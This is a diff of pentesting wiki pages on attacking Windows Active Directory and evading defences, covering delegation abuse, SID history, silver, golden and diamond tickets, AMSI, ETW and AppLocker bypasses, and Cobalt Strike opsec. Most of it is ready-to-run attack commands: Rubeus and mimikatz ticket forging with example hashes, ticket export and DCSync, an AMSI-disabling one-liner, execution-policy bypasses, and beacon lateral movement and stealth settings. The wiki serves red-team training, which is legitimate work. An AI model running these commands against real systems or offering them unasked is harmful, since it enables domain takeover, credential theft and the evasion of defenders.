Get-ADComputer $targetComputer -Properties PrincipalsAllowedToDelegateToAccount #Check that it worked
```
**Using powerview**
```powershell
```bash
$ComputerSid = Get-DomainComputer FAKECOMPUTER -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$ComputerSid)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
@ -93,14 +93,14 @@ Now, the attack can be performed:
rubeus.exe s4u /user:FAKECOMPUTER$ /aes256:<aes256 hash> /aes128:<aes128 hash> /rc4:<rc4 hash> /impersonateuser:administrator /msdsspn:cifs/victim.domain.local /domain:domain.local /ptt
```
You can generate more tickets just asking once using the `/altservice` param of Rubeus:
You can generate more tickets for more services just asking once using the `/altservice` param of Rubeus:
```bash
rubeus.exe s4u /user:FAKECOMPUTER$ /aes256:<AES 256 hash> /impersonateuser:administrator /msdsspn:cifs/victim.domain.local /altservice:krbtgt,cifs,host,http,winrm,RPCSS,wsman,ldap /domain:domain.local /ptt
```
> [!CAUTION]
> Note that users has an attribute called "**Cannot be delegated**". If a user has this attribute to True, you won't be able to impersonate him . This property can be seen inside bloodhound.
> Note that users have an attribute called "**Cannot be delegated**". If a user has this attribute to True, you won't be able to impersonate him. This property can be seen inside bloodhound.
### Accessing
@ -131,6 +131,7 @@ Lear about the [**available service tickets here**](silver-ticket.md#available-s
- [https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/](https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/)
- [https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution#modifying-target-computers-ad-object](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution#modifying-target-computers-ad-object)
- [https://stealthbits.com/blog/resource-based-constrained-delegation-abuse/](https://stealthbits.com/blog/resource-based-constrained-delegation-abuse/)
- [https://posts.specterops.io/kerberosity-killed-the-domain-an-offensive-kerberos-overview-eb04b1402c61](https://posts.specterops.io/kerberosity-killed-the-domain-an-offensive-kerberos-overview-eb04b1402c61)
{{#include ../../banners/hacktricks-training.md}}

44
src/windows-hardening/active-directory-methodology/sid-history-injection.md
View File

@ -14,10 +14,41 @@ You could also use the **Domain Admins** groups, which ends in **512**.
Another way yo find the SID of a group of the other domain (for example "Domain Admins") is with:
```powershell
```bash
Get-DomainGroup -Identity "Domain Admins" -Domain parent.io -Properties ObjectSid
```
> [!WARNING]
> Note that it's possible to disable SID history in a trust relationship which will make this attack fail.
According to the [**docs**](https://technet.microsoft.com/library/cc835085.aspx):
- **Disabling SIDHistory on forest trusts** using the netdom tool (`netdom trust /domain: /EnableSIDHistory:no on the domain controller`)
- **Applying SID Filter Quarantining to external trusts** using the netdom tool (`netdom trust /domain: /quarantine:yes on the domain controller`)
- **Applying SID Filtering to domain trusts within a single forest** is not recommended as it is an unsupported configuration and can cause breaking changes. If a domain within a forest is untrustworthy then it should not be a member of the forest. In this situation it is necessary to first split the trusted and untrusted domains into separate forests where SID Filtering can be applied to an interforest trust
Check this post for more information about bypassing this: [**https://itm8.com/articles/sid-filter-as-security-boundary-between-domains-part-4**](https://itm8.com/articles/sid-filter-as-security-boundary-between-domains-part-4)
### Diamond Ticket (Rubeus + KRBTGT-AES256)
Last time I tried this I needed to add the arg **`/ldap`**.
```bash
# Use the /sids param
Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512 /sids:S-1-5-21-378720957-2217973887-3501892633-512 /krbkey:390b2fdb13cc820d73ecf2dadddd4c9d76425d4c2156b89ac551efb9d591a8aa /nowrap /ldap
# Or a ptt with a golden ticket
## The /ldap command will get the details from the LDAP (so you don't need to put the SID)
## The /printcmd option will print the complete command if later you want to generate a token offline
Rubeus.exe golden /rc4:<krbtgt hash> /domain:<child_domain> /sid:<child_domain_sid> /sids:<parent_domain_sid>-519 /user:Administrator /ptt /ldap /nowrap /printcmd
#e.g.
execute-assembly ../SharpCollection/Rubeus.exe golden /user:Administrator /domain:current.domain.local /sid:S-1-21-19375142345-528315377-138571287 /rc4:12861032628c1c32c012836520fc7123 /sids:S-1-5-21-2318540928-39816350-2043127614-519 /ptt /ldap /nowrap /printcmd
# You can use "Administrator" as username or any other string
```
### Golden Ticket (Mimikatz) with KRBTGT-AES256
```bash
@ -43,17 +74,6 @@ For more info about golden tickets check:
golden-ticket.md
{{#endref}}
### Diamond Ticket (Rubeus + KRBTGT-AES256)
```powershell
# Use the /sids param
Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512 /sids:S-1-5-21-378720957-2217973887-3501892633-512 /krbkey:390b2fdb13cc820d73ecf2dadddd4c9d76425d4c2156b89ac551efb9d591a8aa /nowrap
# Or a ptt with a golden ticket
Rubeus.exe golden /rc4:<krbtgt hash> /domain:<child_domain> /sid:<child_domain_sid> /sids:<parent_domain_sid>-519 /user:Administrator /ptt
# You can use "Administrator" as username or any other string
```
For more info about diamond tickets check:

23
src/windows-hardening/active-directory-methodology/silver-ticket.md
View File

@ -8,6 +8,10 @@
The **Silver Ticket** attack involves the exploitation of service tickets in Active Directory (AD) environments. This method relies on **acquiring the NTLM hash of a service account**, such as a computer account, to forge a Ticket Granting Service (TGS) ticket. With this forged ticket, an attacker can access specific services on the network, **impersonating any user**, typically aiming for administrative privileges. It's emphasized that using AES keys for forging tickets is more secure and less detectable.
> [!WARNING]
> Silver Tickets are less detectable than Golden Tickets because they only require the **hash of the service account**, not the krbtgt account. However, they are limited to the specific service they target. Moreover, just stealing the password of a user.
Moreover, if you compromise an **account's password with a SPN** you can use that password to create a Silver Ticket impersonating any user to that service.
For ticket crafting, different tools are employed based on the operating system:
### On Linux
@ -21,6 +25,11 @@ python psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass
### On Windows
```bash
# Using Rubeus
## /ldap option is used to get domain data automatically
## With /ptt we already load the tickt in memory
rubeus.exe asktgs /user:<USER> [/rc4:<HASH> /aes128:<HASH> /aes256:<HASH>] /domain:<DOMAIN> /ldap /service:cifs/domain.local /ptt /nowrap /printcmd
# Create the ticket
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> /rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET>"
@ -57,6 +66,10 @@ Using **Rubeus** you may **ask for all** these tickets using the parameter:
- 4634: Account Logoff
- 4672: Admin Logon
## Persistence
To avoid machines from rotating their password every 30 days set `HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters\DisablePasswordChange = 1` or you could set `HKLM\SYSTEM\CurrentControlSet\Services\NetLogon\Parameters\MaximumPasswordAge` to a bigger value than 30days to indicate the rotation perdiod when the machines password should be rotated.
## Abusing Service tickets
In the following examples lets imagine that the ticket is retrieved impersonating the administrator account.
@ -140,14 +153,16 @@ mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.loc
**Learn more about DCSync** in the following page:
{{#ref}}
dcsync.md
{{#endref}}
## References
- [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets)
- [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/)
{{#ref}}
dcsync.md
{{#endref}}
- [https://techcommunity.microsoft.com/blog/askds/machine-account-password-process/396027](https://techcommunity.microsoft.com/blog/askds/machine-account-password-process/396027)

28
src/windows-hardening/active-directory-methodology/unconstrained-delegation.md
View File

@ -10,18 +10,28 @@ So if a domain admin logins inside a Computer with "Unconstrained Delegation" fe
You can **find Computer objects with this attribute** checking if the [userAccountControl](<https://msdn.microsoft.com/en-us/library/ms680832(v=vs.85).aspx>) attribute contains [ADS_UF_TRUSTED_FOR_DELEGATION](<https://msdn.microsoft.com/en-us/library/aa772300(v=vs.85).aspx>). You can do this with an LDAP filter of (userAccountControl:1.2.840.113556.1.4.803:=524288), which is what powerview does:
<pre class="language-bash"><code class="lang-bash"># List unconstrained computers
```bash
# List unconstrained computers
## Powerview
Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc
<strong>## ADSearch
</strong>ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
<strong># Export tickets with Mimikatz
</strong>privilege::debug
## A DCs always appear and might be useful to attack a DC from another compromised DC from a different domain (coercing the other DC to authenticate to it)
Get-DomainComputer Unconstrained Properties name
Get-DomainUser -LdapFilter '(userAccountControl:1.2.840.113556.1.4.803:=524288)'
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Export tickets with Mimikatz
## Access LSASS memory
privilege::debug
sekurlsa::tickets /export #Recommended way
kerberos::list /export #Another way
# Monitor logins and export new tickets
.\Rubeus.exe monitor /targetuser:<username> /interval:10 #Check every 10s for new TGTs</code></pre>
## Doens't access LSASS memory directly, but uses Windows APIs
Rubeus.exe dump
Rubeus.exe monitor /interval:10 [/filteruser:<username>] #Check every 10s for new TGTs
```
Load the ticket of Administrator (or victim user) in memory with **Mimikatz** or **Rubeus for a** [**Pass the Ticket**](pass-the-ticket.md)**.**\
More info: [https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/](https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/)\
@ -38,10 +48,10 @@ To make a print server login against any machine you can use [**SpoolSample**](h
.\SpoolSample.exe <printmachine> <unconstrinedmachine>
```
If the TGT if from a domain controller, you could perform a[ **DCSync attack**](acl-persistence-abuse/index.html#dcsync) and obtain all the hashes from the DC.\
If the TGT if from a domain controller, you could perform a [**DCSync attack**](acl-persistence-abuse/index.html#dcsync) and obtain all the hashes from the DC.\
[**More info about this attack in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-dc-print-server-and-kerberos-delegation)
**Here are other ways to try to force an authentication:**
Find here other ways to **force an authentication:**
{{#ref}}
printers-spooler-service-abuse.md

8
src/windows-hardening/authentication-credentials-uac-and-efs.md
View File

@ -13,7 +13,7 @@ It is common for organizations to **block cmd.exe and PowerShell.exe** and write
Check which files/extensions are blacklisted/whitelisted:
```powershell
```bash
Get-ApplockerPolicy -Effective -xml
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
@ -182,14 +182,14 @@ PowerShell [**Constrained Language Mode**](https://devblogs.microsoft.com/powers
### **Check**
```powershell
```bash
$ExecutionContext.SessionState.LanguageMode
#Values could be: FullLanguage or ConstrainedLanguage
```
### Bypass
```powershell
```bash
#Easy bypass
Powershell -version 2
```
@ -215,7 +215,7 @@ You can use [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/
By default it is set to **restricted.** Main ways to bypass this policy:
```powershell
```bash
1º Just copy and paste inside the interactive PS console
2º Read en Exec
Get-Content .runme.ps1 | PowerShell.exe -noprofile -

8
src/windows-hardening/authentication-credentials-uac-and-efs/README.md
View File

@ -13,7 +13,7 @@ It is common for organizations to **block cmd.exe and PowerShell.exe** and write
Check which files/extensions are blacklisted/whitelisted:
```powershell
```bash
Get-ApplockerPolicy -Effective -xml
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
@ -182,14 +182,14 @@ PowerShell [**Constrained Language Mode**](https://devblogs.microsoft.com/powers
### **Check**
```powershell
```bash
$ExecutionContext.SessionState.LanguageMode
#Values could be: FullLanguage or ConstrainedLanguage
```
### Bypass
```powershell
```bash
#Easy bypass
Powershell -version 2
```
@ -215,7 +215,7 @@ You can use [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/
By default it is set to **restricted.** Main ways to bypass this policy:
```powershell
```bash
1º Just copy and paste inside the interactive PS console
2º Read en Exec
Get-Content .runme.ps1 | PowerShell.exe -noprofile -

41
src/windows-hardening/av-bypass.md
View File

@ -70,7 +70,7 @@ Now we'll show some tricks you can use with DLL files to be much more stealthier
You can check for programs susceptible to DLL Sideloading using [Siofra](https://github.com/Cybereason/siofra) and the following powershell script:
```powershell
```bash
Get-ChildItem -Path "C:\Program Files\" -Filter *.exe -Recurse -File -Name| ForEach-Object {
$binarytoCheck = "C:\Program Files\" + $_
C:\Users\user\Desktop\Siofra64.exe --mode file-scan --enum-dependency --dll-hijack -f $binarytoCheck
@ -173,7 +173,7 @@ Since AMSI is implemented by loading a DLL into the powershell (also cscript.exe
Forcing the AMSI initialization to fail (amsiInitFailed) will result that no scan will be initiated for the current process. Originally this was disclosed by [Matt Graeber](https://twitter.com/mattifestation) and Microsoft has developed a signature to prevent wider usage.
```powershell
```bash
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
```
@ -181,7 +181,7 @@ All it took was one line of powershell code to render AMSI unusable for the curr
Here is a modified AMSI bypass I took from this [Github Gist](https://gist.github.com/r00t-3xp10it/a0c6a368769eec3d3255d4814802b5db).
```powershell
```bash
Try{#Ams1 bypass technic nº 2
$Xdatabase = 'Utils';$Homedrive = 'si'
$ComponentDeviceId = "N`onP" + "ubl`ic" -join ''
@ -216,10 +216,10 @@ You can use a tool such as **[https://github.com/cobbr/PSAmsi](https://github.co
You can find a list of AV/EDR products that uses AMSI in **[https://github.com/subat0mik/whoamsi](https://github.com/subat0mik/whoamsi)**.
**Use Poershell version 2**
**Use Powershell version 2**
If you use PowerShell version 2, AMSI will not be loaded, so you can run your scripts without being scanned by AMSI. You can do this:
```powershell
```bash
powershell.exe -version 2
```
@ -230,14 +230,18 @@ PowerShell logging is a feature that allows you to log all PowerShell commands e
To bypass PowerShell logging, you can use the following techniques:
- **Disable PowerShell Transcription and Module Logging**: You can use a tool such as [https://github.com/leechristensen/Random/blob/master/CSharp/DisablePSLogging.cs](https://github.com/leechristensen/Random/blob/master/CSharp/DisablePSLogging.cs) for this purpose.
- **Use Powershell version 2**: If you use PowerShell version 2, AMSI will not be loaded, so you can run your scripts without being scanned by AMSI. You can do this: `powershell.exe -version 2`
- **Use an Unmanaged Powershell Session**: Use [https://github.com/leechristensen/UnmanagedPowerShell](https://github.com/leechristensen/UnmanagedPowerShell) to spawn a powershell withuot defenses (this is what `powerpick` from Cobal Strike uses).
## Obfuscation
> [!NOTE]
> Several obfuscation techniques relies on encrypting data, which will increase the entropy of the binary which will make easier for AVs and EDRs to detect it. Be careful with this and maybe only apply encryption to specific sections of your code that is sensitive or needs to be hidden.
There are several tools that can be used to **obfuscate C# clear-text code**, generate **metaprogramming templates** to compile binaries or **obfuscate compiled binaries** such as:
- [**ConfuserEx**](https://github.com/yck1509/ConfuserEx): It's a great open-source obfuscator for .NET applications. It provides various protection techniques such as control flow obfuscation, anti-debugging, anti-tampering, and string encryption. It's recommened cause it allows even to obfuscate specific chunks of code.
- [**InvisibilityCloak**](https://github.com/h4wkst3r/InvisibilityCloak)**: C# obfuscator**
- [**Obfuscator-LLVM**](https://github.com/obfuscator-llvm/obfuscator): The aim of this project is to provide an open-source fork of the [LLVM](http://www.llvm.org/) compilation suite able to provide increased software security through [code obfuscation](<http://en.wikipedia.org/wiki/Obfuscation_(software)>) and tamper-proofing.
- [**ADVobfuscator**](https://github.com/andrivet/ADVobfuscator): ADVobfuscator demonstates how to use `C++11/14` language to generate, at compile time, obfuscated code without using any external tool and without modifying the compiler.
@ -273,7 +277,7 @@ A very effective way to prevent your payloads from getting the Mark of The Web i
Example usage:
```powershell
```bash
PS C:\Tools\PackMyPayload> python .\PackMyPayload.py .\TotallyLegitApp.exe container.iso
+ o + o + o + o
@ -299,6 +303,15 @@ Here is a demo for bypassing SmartScreen by packaging payloads inside ISO files
<figure><img src="../images/packmypayload_demo.gif" alt=""><figcaption></figcaption></figure>
## ETW
Event Tracing for Windows (ETW) is a powerful logging mechanism in Windows that allows applications and system components to **log events**. However, it can also be used by security products to monitor and detect malicious activities.
Similar to how AMSI is disabled (bypassed) it's also possible to make the **`EtwEventWrite`** function of the user space process return immediately without logging any events. This is done by patching the function in memory to return immediately, effectively disabling ETW logging for that process.
You can find more info in **[https://blog.xpnsec.com/hiding-your-dotnet-etw/](https://blog.xpnsec.com/hiding-your-dotnet-etw/) and [https://github.com/repnz/etw-providers-docs/](https://github.com/repnz/etw-providers-docs/)**.
## C# Assembly Reflection
Loading C# binaries in memory has been known for quite some time and it's still a very great way for running your post-exploitation tools without getting caught by AV.
@ -332,6 +345,16 @@ By allowing access to the Interpreter Binaries and the environment on the SMB sh
The repo indicates: Defender still scans the scripts but by utilising Go, Java, PHP etc we have **more flexibility to bypass static signatures**. Testing with random un-obfuscated reverse shell scripts in these languages has proved successful.
## TokenStomping
Token stomping is a technique that allows an attacker to **manipulate the access token or a security prouct like an EDR or AV**, allowing them to reduce it privileges so the process won't die but it won't have permissions to check for malicious activities.
To prevent this Windows could **prevent external processes** from getting handles over the tokens of security processes.
- [**https://github.com/pwn1sher/KillDefender/**](https://github.com/pwn1sher/KillDefender/)
- [**https://github.com/MartinIngesen/TokenStomp**](https://github.com/MartinIngesen/TokenStomp)
- [**https://github.com/nick-frischkorn/TokenStripBOF**](https://github.com/nick-frischkorn/TokenStripBOF)
## Advanced Evasion
Evasion is a very complicated topic, sometimes you have to take into account many different sources of telemetry in just one system, so it's pretty much impossible to stay completely undetected in mature environments.
@ -597,6 +620,6 @@ https://github.com/praetorian-code/vulcan
### More
- [https://github.com/persianhydra/Xeexe-TopAntivirusEvasion](https://github.com/persianhydra/Xeexe-TopAntivirusEvasion)
- [https://github.com/Seabreg/Xeexe-TopAntivirusEvasion](https://github.com/Seabreg/Xeexe-TopAntivirusEvasion)
{{#include ../banners/hacktricks-training.md}}

2
src/windows-hardening/basic-cmd-for-pentesters.md
View File

@ -368,7 +368,7 @@ who^ami #whoami
Generates an obfuscated CMD line
```powershell
```bash
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1

76
src/windows-hardening/basic-powershell-for-pentesters/README.md
View File

File diff suppressed because one or more lines are too long

30
src/windows-hardening/basic-powershell-for-pentesters/powerview.md
View File

@ -9,7 +9,7 @@ The most up-to-date version of PowerView will always be in the dev branch of Pow
### Quick enumeration
```powershell
```bash
Get-NetDomain #Basic domain info
#User info
Get-NetUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname, description, pwdlastset, logoncount, badpwdcount #Basic user enabled info
@ -42,7 +42,7 @@ Invoke-ACLScanner -ResolveGUIDs | select IdentityReferenceName, ObjectDN, Active
### Domain info
```powershell
```bash
# Domain Info
Get-Domain #Get info about the current domain
Get-NetDomain #Get info about the current domain
@ -67,7 +67,7 @@ Get-ForestDomain
### Users, Groups, Computers & OUs
```powershell
```bash
# Users
## Get usernames and their groups
Get-DomainUser -Properties name, MemberOf | fl
@ -135,7 +135,7 @@ Get-NetOU StudentMachines | %{Get-NetComputer -ADSPath $_} #Get all computers in
### Logon and Sessions
```powershell
```bash
Get-NetLoggedon -ComputerName <servername> #Get net logon users at the moment in a computer (need admins rights on target)
Get-NetSession -ComputerName <servername> #Get active sessions on the host
Get-LoggedOnLocal -ComputerName <servername> #Get locally logon users at the moment (need remote registry (default in server OS))
@ -148,7 +148,7 @@ Get-NetRDPSession -ComputerName <servername> #List RDP sessions inside a host (n
If an attacker has **high privileges over a GPO** he could be able to **privesc** abusing it by **add permissions to a user**, **add a local admin user** to a host or **create a scheduled task** (immediate) to perform an action.\
For [**more info about it and how to abuse it follow this link**](../active-directory-methodology/acl-persistence-abuse/index.html#gpo-delegation).
```powershell
```bash
#GPO
Get-DomainGPO | select displayName #Check the names for info
Get-NetGPO #Get all policies with details
@ -190,7 +190,7 @@ Learn how to **exploit permissions over GPOs and ACLs** in:
### ACL
```powershell
```bash
#Get ACLs of an object (permissions of other objects over the indicated one)
Get-ObjectAcl -SamAccountName <username> -ResolveGUIDs
@ -213,7 +213,7 @@ Get-NetGroupMember -GroupName "Administrators" -Recurse | ?{$_.IsGroup -match "f
### Shared files and folders
```powershell
```bash
Get-NetFileServer #Search file servers. Lot of users use to be logged in this kind of servers
Find-DomainShare -CheckShareAccess #Search readable shares
Find-InterestingDomainShareFile #Find interesting files, can use filters
@ -221,7 +221,7 @@ Find-InterestingDomainShareFile #Find interesting files, can use filters
### Domain Trust
```powershell
```bash
Get-NetDomainTrust #Get all domain trusts (parent, children and external)
Get-DomainTrust #Same
Get-NetForestDomain | Get-NetDomainTrust #Enumerate all the trusts of all the domains found
@ -240,7 +240,7 @@ Get-DomainForeignGroupMember #Get groups with privileges in other domains inside
### L**ow**-**hanging fruit**
```powershell
```bash
#Check if any user passwords are set
$FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl
@ -280,7 +280,7 @@ Invoke-UserHunter -Stealth
### Deleted objects
```powershell
```bash
#This isn't a powerview command, it's a feature from the AD management powershell module of Microsoft
#You need to be in the AD Recycle Bin group of the AD to list the deleted AD objects
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
@ -290,19 +290,19 @@ Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
#### SID to Name
```powershell
```bash
"S-1-5-21-1874506631-3219952063-538504511-2136" | Convert-SidToName
```
#### Kerberoast
```powershell
```bash
Invoke-Kerberoast [-Identity websvc] #Without "-Identity" kerberoast all possible users
```
#### Use different credentials (argument)
```powershell
```bash
# use an alterate creadential for any function
$SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
@ -311,7 +311,7 @@ Get-DomainUser -Credential $Cred
#### Impersonate a user
```powershell
```bash
# if running in -sta mode, impersonate another credential a la "runas /netonly"
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
@ -322,7 +322,7 @@ Invoke-RevertToSelf
#### Set values
```powershell
```bash
# set the specified property for the given user identity
Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose
# Set the owner of 'dfm' in the current domain to 'harmj0y'

134
src/windows-hardening/cobalt-strike.md
View File

@ -38,7 +38,7 @@ If you already has the file you want to host in a web sever just go to `Attacks
<pre class="language-bash"><code class="lang-bash"># Execute local .NET binary
execute-assembly </path/to/executable.exe>
# Note that to load assemblies larger than 1MB, the tasks_max_size property of the malleable profile needs to be modified.
# Note that to load assemblies larger than 1MB, the 'tasks_max_size' property of the malleable profile needs to be modified.
# Screenshots
printscreen # Take a single screenshot via PrintScr method
@ -141,13 +141,13 @@ jump [method] [target] [listener]
## wmi_msbuild x64 wmi lateral movement with msbuild inline c# task (oppsec)
remote-exec [method] [target] [command]
remote-exec [method] [target] [command] # remote-exec doesn't return output
## Methods:
## psexec Remote execute via Service Control Manager
## winrm Remote execute via WinRM (PowerShell)
## wmi Remote execute via WMI
## To execute a beacon with wmi (it isn't ins the jump command) just upload the beacon and execute it
## To execute a beacon with wmi (it isn't in the jump command) just upload the beacon and execute it
beacon> upload C:\Payloads\beacon-smb.exe
beacon> remote-exec wmi srv-1 C:\Windows\beacon-smb.exe
@ -185,18 +185,125 @@ beacon> socks 1080
# SSH connection
beacon> ssh 10.10.17.12:22 username password</code></pre>
## Execute-Assembly
## Opsec
`execute-assembly` uses a sacrificial process using remote process injection to execute the indicated .Net program. Howeevr, there are some custom tools that can be used to load something in the same process:
### Execute-Assembly
The **`execute-assembly`** uses a **sacrificial process** using remote process injection to execute the indicated program. This is very noisy as to inject inside a process certain Win APIs are used that every EDR is checking. However, there are some custom tools that can be used to load something in the same process:
- [https://github.com/anthemtotheego/InlineExecute-Assembly](https://github.com/anthemtotheego/InlineExecute-Assembly)
- [https://github.com/CCob/BOF.NET](https://github.com/CCob/BOF.NET)
- [https://github.com/kyleavery/inject-assembly](https://github.com/kyleavery/inject-assembly)
- In Cobalt Strike you can also use BOF (Beacon Object Files): [https://github.com/CCob/BOF.NET](https://github.com/CCob/BOF.NET)
- [https://github.com/kyleavery/inject-assembly](https://github.com/kyleavery/inject-assembly)
The agressor script `https://github.com/outflanknl/HelpColor` will create the `helpx` command in Cobalt Strike which will put colors in commands indicating if they are BOFs (green), if they are Frok&Run (yellow) and similar, or if they are ProcessExecution, injection or similar (red). Which helps to know which commands are more stealthy.
## Avoiding AVs
### Act as the user
### Artifact Kit
You could check events like `Seatbelt.exe LogonEvents ExplicitLogonEvents PoweredOnEvents`:
- Security EID 4624 - Check all the interactive logons to know the usual operating hours.
- System EID 12,13 - Check the shutdown/startup/sleep frequency.
- Security EID 4624/4625 - Check inbound valid/invalid NTLM attempts.
- Security EID 4648 - This event is created when plaintext credentials are used to logon. If a process generated it, the binary potentially has the credentials in clear text ina config file or inside the code.
When using `jump` from cobalt strike, it's better to use the `wmi_msbuild` method to make the new process look more legit.
### Use computer accounts
It's common for defenders to be checking weird behaviours generated from users abd **exclude service accounts and computer accounts like `*$` from their monitoring**. You could use these accounts to perform lateral movement or privilege escalation.
### Use stageless payloads
Stageless payloads are less noisy than staged ones because they don't need to download a second stage from the C2 server. This means that they don't generate any network traffic after the initial connection, making them less likely to be detected by network-based defenses.
### Tokens & Token Store
Be careful when you steal or generate tokens because it might be posisble for an EDR to enumerate all the tokens of all the threads and find a **token belonging to a different user** or even SYSTEM in the process.
This allows to store tokens **per beacon** so it's not needed to steal the same token again and again. This is useful for lateral movement or when you need to use a stolen token multiple times:
- token-store steal <pid>
- token-store steal-and-use <pid>
- token-store show
- token-store use <id>
- token-store remove <id>
- token-store remove-all
When moving laterally, usually is better to **steal a token than to generate a new one** or perform a pass the hash attack.
### Guardrails
Cobalt Strike has a feature called **Guardrails** that helps to prevent the use of certain commands or actions that could be detected by defenders. Guardrails can be configured to block specific commands, such as `make_token`, `jump`, `remote-exec`, and others that are commonly used for lateral movement or privilege escalation.
Moreover, the repo [https://github.com/Arvanaghi/CheckPlease/wiki/System-Related-Checks](https://github.com/Arvanaghi/CheckPlease/wiki/System-Related-Checks) also contains some checks and ideas you could consider before executing a payload.
### Tickets encryption
In an AD be careful with the encryption of the tickets. By default, some tools will use RC4 encryption for Kerberos tickets, which is less secure than AES encryption and by default up to date environments will use AES. This can be detected by defenders who are monitoring for weak encryption algorithms.
### Avoid Defaults
When using Cobalt Stricke by default the SMB pipes will have the name `msagent_####` and `"status_####`. Change those names. It's possible to check the names of the existing pipes from Cobal Strike with the command: `ls \\.\pipe\`
Moreover, with SSH sessions a pipe called `\\.\pipe\postex_ssh_####` is created. Chage it with `set ssh_pipename "<new_name>";`.
Also in poext exploitation attack the pipes `\\.\pipe\postex_####` can be modified with `set pipename "<new_name>"`.
In Cobalt Strike profiles you can also modify things like:
- Avoiding using `rwx`
- How the process injection behavior works (which APIs will be used) in the `process-inject {...}` block
- How the "fork and run" works in the `post-ex {…}` block
- The sleep time
- The max size of binaries to be loaded in memory
- The memory footprint and DLL content with `stage {...}` block
- The network traffic
### Bypass memory scanning
Some ERDs scan memory for some know malware signatures. Coblat Strike allows to modify the `sleep_mask` function as a BOF that will be able to encrypt in memory the bacldoor.
### Noisy proc injections
When injecting code into a process this is usually very noisy, this is because **no regular process usually performs this action and because the ways to do this are very limited**. Tehrefore, it' could be detected by behaviour-based detection systems. Moroever, it could also be detected by EDRs scanning the network for **threads containing code that is not in disk** (although processes such as browsers using JIT have this commonly). Example: [https://gist.github.com/jaredcatkinson/23905d34537ce4b5b1818c3e6405c1d2](https://gist.github.com/jaredcatkinson/23905d34537ce4b5b1818c3e6405c1d2)
### Spawnas | PID and PPID relationships
When spawning a new process it's important to **maintain a regular parent-child** relationship between processes to avoid detection. If svchost.exec is executing iexplorer.exe it'll look suspicious, as svchost.exe is not a parent of iexplorer.exe in a normal Windows environment.
When a new beacon is spawned in Cobalt Strike by default a process using **`rundll32.exe`** is created to run the new listener. This is not very stealthy and can be easily detected by EDRs. Moreover, `rundll32.exe` is run without any args making it even more suspicious.
With the following Cobalt Strike command, you can specify a different process to spawn the new beacon, making it less detectable:
```bash
spawnto x86 svchost.exe
```
You can aso change this setting **`spawnto_x86` and `spawnto_x64`** in a profile.
### Proxying attackers traffic
Atters sometime will need to be able to run tools lically, even in linux machines and make the traffic of the victims reach the tool (e.g. NTLM relay).
Moreover, sometimes to do a pass-the.hash or pass-the-ticket attack it's stealthier for the attacker to **add this hash or ticket in his own LSASS process** locally and then pivot from it instead of modifying an LSASS process of a victim machine.
However, you need to be **careful with the generated traffic**, as you might be sending uncommon traffic (kerberos?) from your backdoor process. For this you could pivot to a browser process (although you could get caught injecting yourself into a process so think about a stealth way to do this).
```bash
### Avoiding AVs
#### AV/AMSI/ETW Bypass
Check the page:
{{#ref}}
av-bypass.md
{{#endref}}
#### Artifact Kit
Usually in `/opt/cobaltstrike/artifact-kit` you can find the code and pre-compiled templates (in `/src-common`) of the payloads that cobalt strike is going to use to generate the binary beacons.
@ -210,7 +317,7 @@ pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe .
Don't forget to load the aggressive script `dist-pipe\artifact.cna` to indicate Cobalt Strike to use the resources from disk that we want and not the ones loaded.
### Resource Kit
#### Resource Kit
The ResourceKit folder contains the templates for Cobalt Strike's script-based payloads including PowerShell, VBA and HTA.
